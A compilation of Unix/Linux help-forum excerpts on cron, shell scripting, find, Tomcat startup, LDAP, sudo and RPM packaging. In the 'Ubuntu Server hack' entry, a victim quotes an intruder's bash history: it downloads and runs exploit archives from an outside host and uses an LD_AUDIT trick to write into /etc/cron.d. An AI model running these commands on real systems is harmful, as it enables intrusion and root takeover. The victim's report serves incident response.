  • What is wrong with those crontabs?

    - by Guillaume Boudreau
    I want my projectors to Power On before the mall opens, and Power Off when the mall closes. So I created crontab entries (that I placed in /etc/cron.d/mall), but today (Thu Nov 22 18:58:29 EST 2012 is the current date on that server), the power-off.sh script got executed at 17:20 (see syslog excerpt below). Being Thu, Nov. 22, I would have expected the power-off.sh script to be executed at 21:20, per the 4th crontab line below. Why did power-off.sh execute at 17:20? What is wrong with my crontab entries? Content of /etc/cron.d/mall: 40 9 22-30 Nov Mon-Sat myuser /usr/local/projectors/power-on.sh 40 10 22-30 Nov Sun myuser /usr/local/projectors/power-on.sh 20 18 22-30 Nov Mon-Wed myuser /usr/local/projectors/power-off.sh 20 21 22-30 Nov Thu-Fri myuser /usr/local/projectors/power-off.sh 20 17 22-30 Nov Sat-Sun myuser /usr/local/projectors/power-off.sh 40 9 1-22 Dec Mon-Sat myuser /usr/local/projectors/power-on.sh 40 10 1-22 Dec Sun myuser /usr/local/projectors/power-on.sh 20 21 1-22 Dec Mon-Fri myuser /usr/local/projectors/power-off.sh 20 17 1-22 Dec Sat-Sun myuser /usr/local/projectors/power-off.sh syslog excerpt: $ grep power-off.sh /var/log/syslog Nov 22 17:20:01 lanner-ubu-c2d CRON[23007]: (myuser) CMD (/usr/local/projectors/power-off.sh)

  • How to evaluate text strings provided by sed/grep/whatever?

    - by T.J.
This is for UNIX shell programming. It have to be supported by multiple UNIX platforms including Solaris, Linux, and AIX. I have this scenario -- I am to read from a text file a string that may or may not contain an environment variable that may or may not be defined. For example: <foo.bar> This error code was found: $(error_code) I have the following code: statement=$(sed -n $1'p' $messagefile) echo $echo_flag $statement $1 = line number supplied to this particular function/script. $messagefile = filename of log file. $echo_flag = "-e" in Linux, otherwise, empty. $(error_code) = 42. Instead of getting this when running: <foo.bar> This error code was found: 42 I still get this: <foo.bar> This error code was found: $(error_code) How exactly do I tell the shell script that the value of statement should be evaluated further beyond what sed have done?

  • find, excluding dir, not descending into dir, AND using maxdepth and mindepth

    - by user1680819
This is RHEL 5.6 and GNU find 4.2.27. I am trying to exclude a directory from find, and want to make sure that directory isn't descended into. I've seen plenty of posts saying -prune will do this - and it does. I can run this command: find . -type d -name "./.snapshot*" -prune -o -print and it works. I run it through strace and verify it is NOT descending into .snapshot. I also want to find directories ONLY at a certain level. I can use mindepth and maxdepth to do this: find . -maxdepth 8 -mindepth 8 -type d and it gives me all the dirs 8 levels down, including what's in .snapshot. If I combine the prune and mindepth and maxdepth options: find . -maxdepth 8 -mindepth 8 -type d \( -path "./.snapshot/*" -prune -o -print \) the output is right - I see all the dirs 8 levels down except for what's in .snapshot, but if I run that find through strace, I see that .snapshot is still being descended into - to levels 1 through 8. I've tried a variety of different combinations, moving the precedence parens around, reording expression components - everything that yields the right output still descends into .snapshot. I see in the man page that -prune doesn't work with -depth, but doesn't say anything about mindepth and maxdepth. Can anyone offer any advice? Thanks... Bill

  • grep from a log file to get count

    - by subodh1989
I have to get certain count from files. The grep statement i am using is like this : counter_pstn=0 completed_count_pstn=0 rec=0 for rec in `(grep "merged" update_completed*.log | awk '{print $1}' | sed 's/ //g' | cut -d':' -f2)` do if [ $counter_pstn -eq 0 ] then completed_count_pstn=$rec else completed_count_pstn=$(($completed_count_pstn+$rec)) fi counter_pstn=$(($counter_pstn+1)) done echo "Completed Orders PSTN Primary " $completed_count_pstn But the log file contains data in this format : 2500 rows merged. 2500 rows merged. 2500 rows merged. 2500 rows merged.2500 rows merged. 2500 rows merged. 2500 rows merged. As a result , it is missing out the count of one merge(eg on line 4 of output). How do i modify the grep or use another function to get the count. NOTE that the 2500 number maybe for different logs. So we have to use "rows merged" pattern to get the count. i have tried -o ,-w grep options, but it is not working. Expected output from above data: 17500 Actual output showing : 15000

  • New Shell In Oracle Solaris 11

    - by rickramsey
In Oracle Solaris 11, Korn Shell 93 (/usr/bin/ksh/ or usr/bin/ksh93) replaces both the Bourne Shell (/usr/bin/sh or /sbin/sh) and Korn Shell 88 (/usr/bin/ksh). There are some incompatibilities between the shells. They are described in: /usr/share/doc/ksh/COMPATIBILITY If a script has compatibility problems you can use the legacy shell by changing the she-bang line: If this doesn't work Use This #!/bin/ksh #!/usr/sunos/bin/ksh #!/usr/bin/ksh #!/usr/sunos/bin/ksh     #!/bin/sh #!/usr/sunos/bin/sh #!/usr/bin/sh #!/usr/sunos/bin/sh #!/sbin/sh #!/usr/sunos/bin/sh - Mike Gerdts http://blogs.oracle.com/zoneszone/ Website Newsletter Facebook Twitter

  • How to automatically restart Tomcat7 on system reboots?

    - by coding crow
I have installed Tomcat 7 on Ubuntu 12.04 LTS which run on an Amzon EC2 instance. Now I wish tomcat should restart automatically on system reboot. I read this blog which suggest adding below script to /etc/init.d/tomcat7 # Tomcat auto-start # # description: Auto-starts tomcat # processname: tomcat # pidfile: /var/run/tomcat.pid case $1 in start) sh /usr/share/tomcat7/bin/startup.sh ;; stop) sh /usr/share/tomcat7/bin/shutdown.sh ;; restart) sh /usr/share/tomcat7/bin/shutdown.sh sh /usr/share/tomcat7/bin/startup.sh ;; esac exit 0 and issue the following commands sudo chmod 755 /etc/init.d/tomcat7 sudo ln -s /etc/init.d/tomcat7 /etc/rc1.d/K99tomcat sudo ln -s /etc/init.d/tomcat7 /etc/rc2.d/S99tomcat sudo /etc/init.d/tomcat7 restart My Questions The tomcat7 already has script in it, where do we have to paste the suggested script? Is the suggested procedure correct?

  • Ubuntu Server hack [closed]

Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. • How do I add a launcher for .sh applications?

    - by Hailwood
I have installed ubuntu (11.04). I installed phpstorm which is simply an archive for you to extract and shove in your /opt directory. To run it you would use /opt/PhpStorm-103.243/bin/PhpStorm.sh In unity I had created a launcher on my desktop. Now I have installed gnome-3(gnome-shell), And I have nothing in my desktop. So how do I run phpstorm quickly? Can I get it to show up in "applications"?

  • How do I add unmet dependencies for unity-lens-music autogen.sh?

    - by nickform
I would like to build unity-lens-music on my newly-upgraded Ubuntu 12.10 machine. I followed these instructions from the unity website to get the code. The README was empty but I guessed that ./autogen.sh would be a sensible place to start. Unfortunately it exits with the following error: checking for LENS_DAEMON... no configure: error: Package requirements (glib-2.0 >= 2.27 gobject-2.0 >= 2.27 gio-2.0 >= 2.27 gio-unix-2.0 >= 2.27 dee-1.0 >= 1.0.7 sqlite3 >= 3.7.7 gee-1.0 json-glib-1.0 unity >= 6.90.0 unity-extras >= 6.90.0 tdb >= 1.2.6) were not met: No package 'dee-1.0' found No package 'sqlite3' found No package 'gee-1.0' found No package 'json-glib-1.0' found No package 'unity' found No package 'unity-extras' found No package 'tdb' found When I attempt to satisfy the dependencies that aren't found using apt-get install I either find that there is no exact match (e.g. 'dee-1.0' which matches several packages), I already have the latest version (e.g. sqlite3, unity) or there is no match at all (e.g. unity-extras and tdb). There is a later suggestion to modify PKG_CONFIG_PATH if I have installed software in a non-standard location but, to my knowledge, I have not. How should I proceed?

  • Startup script on Ubuntu 12.04 not getting executed. Dependencies / load order.

    - by user861181
I want to create a simple startup script on Ubuntu 12.04: myscript.sh #!/bin/sh sudo /etc/init.d/nginx start cd ~/app/current god -c config/resque.god sudo /etc/init.d/redis-server start echo "SCRIPT RUN" I have it at /etc/init.d/myscript.sh When I do sudo chkconfig --level 2345 myscript.sh I get myscript.sh 2345 When I do sudo chkconfig --add myscript.sh I get insserv: warning: script 'K01myscript.sh' missing LSB tags and overrides insserv: warning: script 'myscript.sh' missing LSB tags and overrides The script you are attempting to invoke has been converted to an Upstart job, but lsb-header is not supported for Upstart jobs. insserv: warning: script 'dbus' missing LSB tags and overrides .... myscript.sh 0:off 1:off 2:on 3:on 4:on 5:on 6:off ** EDIT:: I checked the boot.log and it turns out that the script is run, but the problem is that god is not loaded yet when the script is executed. Apparently I want to load this script as the very last thing at startup (or somehow check if god is loaded and then start the script).

  • Cronjob terminates early

    - by TheBigO
In my crontab file I execute a script like so (I edit the crontab using sudo crontab -e): 01 * * * * bash /etc/m/start.sh The script runs some other scripts like so: sudo bash -c "/etc/m/abc.sh --option=1" & sleep 2 sudo bash -c "/etc/m/abc.sh --option=2" & When cron runs the script start.sh, I do ps aux | grep abc.sh and I see the abc.sh script running. After a couple of seconds, the script is no longer running, even though abc.sh should take hours to finish. If I do sudo bash /etc/m/start.sh & from the command line, everything works fine (the abc.sh scripts run for hours in the background until they complete). How do I debug this? Is there something I'm doing that is preventing these scripts from running in the background until they are done?

  • how to run multiple shell scripts in parallel

    - by tom smith
I've got a few test scripts, each of which runs a test php app. Each script runs forever. So, cat.sh, dog.sh, and foo.sh, each run a php script, and each shell script runs the php app in a loop, so it runs forever, sleeping after each run. I'm trying to figure out how to run the scripts in parallel, and at the same time, see the output of the php apps in the stdout/term window. I thought, simply doing something like foo.sh > &2 dog.sh > &2 cat.sh > &2 in a shell script would be sufficient, but it's not working. foo.sh, runs foo.php once, and it runs correctly dog.sh, runs dog.php in a never ending loop. it runs as expected cat.sh, runs cat.php in a never ending loop *** this never runs!!! it appears that the shell script never gets to run cat.sh. if i run cat.sh by itself in a separate window/term, it runs as expected... thoughts/comments

  • Can't configure PAM + LDAP on Debian Lenny - Getting error=49 on server logs

    - by Jorge Suárez de Lis
I've been migrating some servers and desktops using Ubuntu 10.04 from getting the users from an old OpenLDAP implementation to a newer Centos Active Directory. I haven't had any problems so far, until I reached a Debian Lenny server. I've set up the server as the others, setting /etc/ldap.conf and /etc/ldap/ldap.conf. However, when I issue "getent passwd", I get nothing from the LDAP server. Reading the pam_ldap manpage, I realized that /etc/ldap.conf was not an accepted file by pam_ldap -it worked with Ubuntu though-, so I renamed it to /etc/pam_ldap.conf. Same result. However, once I've changed the name of this file, when I login using SSH I get this on the LDAP server logs: [20/Jul/2012:11:19:40 +0200] conn=16501 fd=155 slot=155 connection from x.x.x.50 to 10.1.176.237 [20/Jul/2012:11:19:40 +0200] conn=16501 op=0 BIND dn="uid=ubuntu,ou=Applications,ou=CITIUS,dc=inv,dc=usc,dc=es" method=128 version=3 [20/Jul/2012:11:19:40 +0200] conn=16501 op=0 RESULT err=0 tag=97 nentries=0 etime=0 dn="uid=ubuntu,ou=applications,ou=citius,dc=inv,dc=usc,dc=es" [20/Jul/2012:11:19:40 +0200] conn=16501 op=1 SRCH base="ou=People,ou=CITIUS,dc=inv,dc=usc,dc=es" scope=2 filter="(uid=jorge.suarez)" attrs=ALL [20/Jul/2012:11:19:40 +0200] conn=16501 op=1 RESULT err=0 tag=101 nentries=1 etime=0 notes=U [20/Jul/2012:11:19:40 +0200] conn=16501 op=2 BIND dn="uid=jorge.suarez,ou=People,ou=CITIUS,dc=inv,dc=usc,dc=es" method=128 version=3 [20/Jul/2012:11:19:40 +0200] conn=16501 op=2 RESULT err=49 tag=97 nentries=0 etime=0 The password isn't working. Maybe this is not supported by Debian Lenny? On pam_ldap.conf, I've set up this, as in all the other servers: # Do not hash the password at all; presume # the directory server will do it, if # necessary. This is the default. pam_password md5 Also tried clear, but it didn't work. Anyways, it's weird that issuing getent passwd still gets me no users. However, if I use pamtest from the package libpam-dotfile to test login, it works. # pamtest ssh jorge.suarez Trying to authenticate <jorge.suarez> for service <ssh>. Password: Authentication successful. # pamtest foo jorge.suarez Trying to authenticate <jorge.suarez> for service <foo>. Password: Authentication successful. But "su" won't work also: # su jorge.suarez Id. descoñecido: jorge.suarez Just the output from getent passwd : # getent passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin luser:x:1000:1000:Usuario local de Burdeos,,,:/home/luser:/bin/bash messagebus:x:105:107::/var/run/dbus:/bin/false sge-admin:x:1001:1001:Administrador do SGE,,,:/home/cluster/sge-admin:/bin/bash ntp:x:107:110::/home/ntp:/bin/false haldaemon:x:108:111:Hardware abstraction layer,,,:/var/run/hald:/bin/false vde2-net:x:109:114::/var/run/vde2:/bin/false uml-net:x:110:115::/home/uml-net:/bin/false polkituser:x:111:116:PolicyKit,,,:/var/run/PolicyKit:/bin/false Debian-pxe:x:113:65534:Dummy user for Debian pxe package,,,:/home/Debian-pxe:/bin/false Nscd was stopped from the beginning.

  • Sourcing a shell script, while running with sudo

    - by WishCow
I would like to write a shell script that sets up a mercurial repository, and allow all users in the group "developers" to execute this script. The script is owned by the user "hg", and works fine when ran. The problem comes when I try to run it with another user, using sudo, the execution halts with a "permission denied" error, when it tries to source another file. The script file in question: create_repo.sh #!/bin/bash source colors.sh REPOROOT="/srv/repository/mercurial/" ... rest of the script .... Permissions of create_repo.sh, and colors.sh: -rwxr--r-- 1 hg hg 551 2011-01-07 10:20 colors.sh -rwxr--r-- 1 hg hg 1137 2011-01-07 11:08 create_repo.sh Sudoers setup: %developer ALL = (hg) NOPASSWD: /home/hg/scripts/create_repo.sh What I'm trying to run: user@nebu:~$ id uid=1000(user) gid=1000(user) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),113(sambashare),116(admin),1000(user),1001(developer) user@nebu:~$ sudo -l Matching Defaults entries for user on this host: env_reset User user may run the following commands on this host: (ALL) ALL (hg) NOPASSWD: /home/hg/scripts/create_repo.sh user@nebu:~$ sudo -u hg /home/hg/scripts/create_repo.sh /home/hg/scripts/create_repo.sh: line 3: colors.sh: Permission denied So the script is executed, but halts when it tries to include the other script. I have also tried using: user@nebu:~$ sudo -u hg /bin/bash /home/hg/scripts/create_repo.sh Which gives the same result. What is the correct way to include another shell script, if the script may be ran with a different user, through sudo?

  • Weblogic 12 and the CLI

    - by Rig
I am working with WebLogic on Fedora 19 and am attempting to use the CLI tools to no avail. It appears these were deprecated as far back as WebLogic 9 however I was assured they are still there and still functional. As it stands I have a need to use them if they are in fact functional. What appears to the case is that the weblogic jar file is not being loaded correctly to the classpath by this script after trying to manually add it to the classpath as it fails when trying to add those jars via java -classpath <path>. I've spent a lot of time so far trying to get this sorted out but I'm wondering what I may be missing here. My Java runtime is version 7, Fedora is 19, and WebLogic is 12.1. When I run env after running the provided set environment script it appears to have no impact from what I can see. (I'll add that later when I get back to that machine). I'm mostly a Windows developer so some of this is a topic I'm not well versed in. • Effect of HOME on libreoffice to convert to pdf as non-root user

    - by user1032531
I installed libreoffice-headless and can convert documents when logged on as root. I then tried doing so as another user, and it didn't show an error, but didn't convert the file. I then found that if I get rid of the HOME=/tmp/ayb, it works with the other user. Doesn't HOME=/tmp/ayb just allow files to default to this directory if not specified? (Sorry, I tried to search "Linux HOME", but as you probably expect, received a bunch of non-relevant results). If not, what is the purpose of specifying HOME? Why does setting HOME prevent it from converting on non-root users? Note that /tmp and /tmp/ayb or both 0777. Thank you [root@desktop ~]# yum install libreoffice-headless [root@desktop ~]# yum install libreoffice-writer [root@desktop ~]# ls -l total 48 -rwxrwxrwx. 1 NotionCommotion NotionCommotion 48128 Jul 30 02:38 document_34.doc [root@desktop ~]# HOME=/tmp/ayb; /usr/bin/libreoffice --headless -convert-to pdf --outdir /tmp/ayb /tmp/ayb/document_34.doc convert /tmp/ayb/document_34.doc -> /tmp/ayb/document_34.pdf using writer_pdf_Export [root@desktop ~]# rm d*.pdf rm: remove regular file `document_34.pdf'? y [root@desktop ~]# /usr/bin/libreoffice --headless -convert-to pdf --outdir /tmp/ayb /tmp/ayb/document_34.doc convert /tmp/ayb/document_34.doc -> /tmp/ayb/document_34.pdf using writer_pdf_Export [root@desktop ~]# rm d*.pdf rm: remove regular file `document_34.pdf'? y [root@desktop ~]# su NotionCommotion sh-4.1$ HOME=/tmp/ayb; /usr/bin/libreoffice --headless -convert-to pdf --outdir /tmp/ayb /tmp/ayb/document_34.doc sh-4.1$ rm d*.pdf rm: cannot remove `d*.pdf': No such file or directory sh-4.1$ /usr/bin/libreoffice --headless -convert-to pdf --outdir /tmp/ayb /tmp/ayb/document_34.doc sh-4.1$ rm d*.pdf rm: cannot remove `d*.pdf': No such file or directory sh-4.1$ exit exit [root@desktop ~]# su NotionCommotion sh-4.1$ /usr/bin/libreoffice --headless -convert-to pdf --outdir /tmp/ayb /tmp/ayb/document_34.doc convert /tmp/ayb/document_34.doc -> /tmp/ayb/document_34.pdf using writer_pdf_Export sh-4.1$ rm d*.pdf sh-4.1$ HOME=/tmp/ayb; /usr/bin/libreoffice --headless -convert-to pdf --outdir /tmp/ayb /tmp/ayb/document_34.doc sh-4.1$ rm d*.pdf rm: cannot remove `d*.pdf': No such file or directory sh-4.1$ /usr/bin/libreoffice --headless -convert-to pdf --outdir /tmp/ayb /tmp/ayb/document_34.doc sh-4.1$ rm d*.pdf rm: cannot remove `d*.pdf': No such file or directory sh-4.1$

  • shell script to start multiple Java programs from a directory at boot

    - by zcourts
I'm not sure if this is the best approach to this, It's my first time doing all of this (including writing shell scripts). OS: Centos My problem: I want to start multiple shell scripts at boot. One of the shell scripts is to start my own services and 3 others are for third party services. The shell script to start my own services will be looking for jar files. I currently have two services (will change), written in Java. All services are named under convention prefix-service-servicename What I've done: I created the following directory structure /home/username/scripts init.sh boot/ boot/startthirdprtyservice1.sh boot/startthirdprtyservice2.sh boot/startthirdprtyservice3.sh boot/startmyservices.sh /home/username/services prefix-lib-libraryname.jar prefix-lib-libraryname.jar prefix-service-servicename.jar prefix-service-servicename.jar prefix-service-servicename.jar In init.sh I have the following: #!/bin/sh #This scripts run all executable scripts in the boot directory at boot #done by adding this script to the file /etc/rc.d/rc.local #nohup #run-parts /home/username/scripts/boot/* #for each file in the boot dir... # ignore the HUP (hangup) signal for s in ./boot/*;do if [ -x $s ]; then echo "Starting $s" nohup $s & fi done echo "Done starting bootup scripts " echo "\n" In the script boot/startmyservices.sh I have #!/bin/sh fnmatch () { case "$2" in $1) return 0 ;; esac ; return 1 ; } ##sub strin to match for SUBSTRING="prefix-service" for s in /home/username/services/*;do if [ -x $s ]; then #match service in the filename , i.e. only services are started if fnmatch "$SUBSTRING" "$s" ; then echo "Starting $s " nohup $s & fi fi done echo "Done starting Services" echo "\n" Finally: Usually you can stick a program in /etc/rc.d/rc.local for it to be run at boot but I don't think this works in this case, or rather I don't know what to put in there I've just learnt how to do this by reading up a bit so I'm not sure its particularly the best thing to do so any advice is appreciated. When I run init.sh nohup.out contains Starting the thirdparty daemon... thirdparty started... .... but nothing from myservices.sh and my Java services aren't running I'm not sure where to start debugging or what could be going wrong. Edit Found some issues and got it to work, used -x instead of -n to check if the string is none zero, needed the sub string check to also be if [[ $s = $SUBSTRING ]] ; then and this last one was just stupid, missing java -jar in front of $s Still unsure of how to get init.sh to run at boot though

  • Start and shutdown tomcat via ssh

    - by bxshi
Updated I find out that the path of jdk it using is wrong. eval: 1: /opt/Java/jdk1.6.0_25/jre/bin/java: not found the Java should be lower case java, how is that happen? When I run this script directly on server, it is just okay. I'm trying to start or shutdown tomcat via a remote client. On my server, I've got 3 different tomcat: tomcat1, tomcat2, and tomcat3. Firstly, I've tried to run tomcat_path/bin/shutdown.sh to stop it via ssh, and the command is ssh [email protected] "cd /home/jake/tomcat2/bin;exec bash ./shutdown.sh" both " and ' are tried, but do not work, the output is eval: 1: /opt/Java/jdk1.6.0_25/jre/bin/java: not found it seems that the shell script runs on my local client, because on server it has this file. Is there any way to run a shell script on remote server correctly? updated I've run ssh [email protected] "sh -x /home/jake/tomcat/bin/shutdown.sh > /home/jake/tomcat.log 2>&1" and the output in tomcat.log is : + PRG=/home/jake/tomcat/bin/shutdown.sh + [ -h /home/jake/tomcat/bin/shutdown.sh ] + dirname /home/jake/tomcat/bin/shutdown.sh + PRGDIR=/home/jake/tomcat/bin + EXECUTABLE=catalina.sh + [ ! -x /home/jake/tomcat/bin/catalina.sh ] + exec /home/jake/tomcat/bin/catalina.sh stop eval: 1: /opt/Java/jdk1.6.0_25/jre/bin/java: not found

  • BUILDROOT files during RPM generation

    - by khmarbaise
Currently i have the following spec file to create a RPM. The spec file is generated by maven plugin to produce a RPM out of it. The question is: will i find files which are mentioned in the spec file after the rpm generation inside the BUILDROOT/SPECS/SOURCES/SRPMS structure? %define _unpackaged_files_terminate_build 0 Name: rpm-1 Version: 1.0 Release: 1 Summary: rpm-1 License: 2009 my org Distribution: My App Vendor: my org URL: www.my.org Group: Application/Collectors Packager: my org Provides: project Requires: /bin/sh Requires: jre >= 1.5 Requires: BASE_PACKAGE PreReq: dependency Obsoletes: project autoprov: yes autoreq: yes BuildRoot: /home/build/.jenkins/jobs/rpm-maven-plugin/workspace/target/it/rpm-1/target/rpm/rpm-1/buildroot %description %install if [ -e $RPM_BUILD_ROOT ]; then mv /home/build/.jenkins/jobs/rpm-maven-plugin/workspace/target/it/rpm-1/target/rpm/rpm-1/tmp-buildroot/* $RPM_BUILD_ROOT else mv /home/build/.jenkins/jobs/rpm-maven-plugin/workspace/target/it/rpm-1/target/rpm/rpm-1/tmp-buildroot $RPM_BUILD_ROOT fi ln -s /usr/myusr/app $RPM_BUILD_ROOT/usr/myusr/app2 ln -s /tmp/myapp/somefile $RPM_BUILD_ROOT/tmp/myapp/somefile2 ln -s name.sh $RPM_BUILD_ROOT/usr/myusr/app/bin/oldname.sh %files %defattr(-,myuser,mygroup,-) %dir "/usr/myusr/app" "/usr/myusr/app2" "/tmp/myapp/somefile" "/tmp/myapp/somefile2" "/usr/myusr/app/lib" %attr(755,myuser,mygroup) "/usr/myusr/app/bin/start.sh" %attr(755,myuser,mygroup) "/usr/myusr/app/bin/filter-version.txt" %attr(755,myuser,mygroup) "/usr/myusr/app/bin/name.sh" %attr(755,myuser,mygroup) "/usr/myusr/app/bin/name-Linux.sh" %attr(755,myuser,mygroup) "/usr/myusr/app/bin/filter.txt" %attr(755,myuser,mygroup) "/usr/myusr/app/bin/oldname.sh" %dir "/usr/myusr/app/conf" %config "/usr/myusr/app/conf/log4j.xml" "/usr/myusr/app/conf/log4j.xml.deliver" %prep echo "hello from prepare" %pre -p /bin/sh #!/bin/sh if [ -s "/etc/init.d/myapp" ] then /etc/init.d/myapp stop rm /etc/init.d/myapp fi %post #!/bin/sh #create soft link script to services directory ln -s /usr/myusr/app/bin/start.sh /etc/init.d/myapp chmod 555 /etc/init.d/myapp %preun #!/bin/sh #the argument being passed in indicates how many versions will exist #during an upgrade, this value will be 1, in which case we do not want to stop #the service since the new version will be running once this script is called #during an uninstall, the value will be 0, in which case we do want to stop #the service and remove the /etc/init.d script. if [ "$1" = "0" ] then if [ -s "/etc/init.d/myapp" ] then /etc/init.d/myapp stop rm /etc/init.d/myapp fi fi; %triggerin -- dependency, dependency1 echo "hello from install" %changelog * Tue May 23 2000 Vincent Danen <[email protected]> 0.27.2-2mdk -update BuildPreReq to include rep-gtk and rep-gtkgnome * Thu May 11 2000 Vincent Danen <[email protected]> 0.27.2-1mdk -0.27.2 * Thu May 11 2000 Vincent Danen <[email protected]> 0.27.1-2mdk -added BuildPreReq -change name from Sawmill to Sawfish The problem i found is that the files (filter.txt in particular) after the generation process on a Ubuntu system but not on SuSE system.
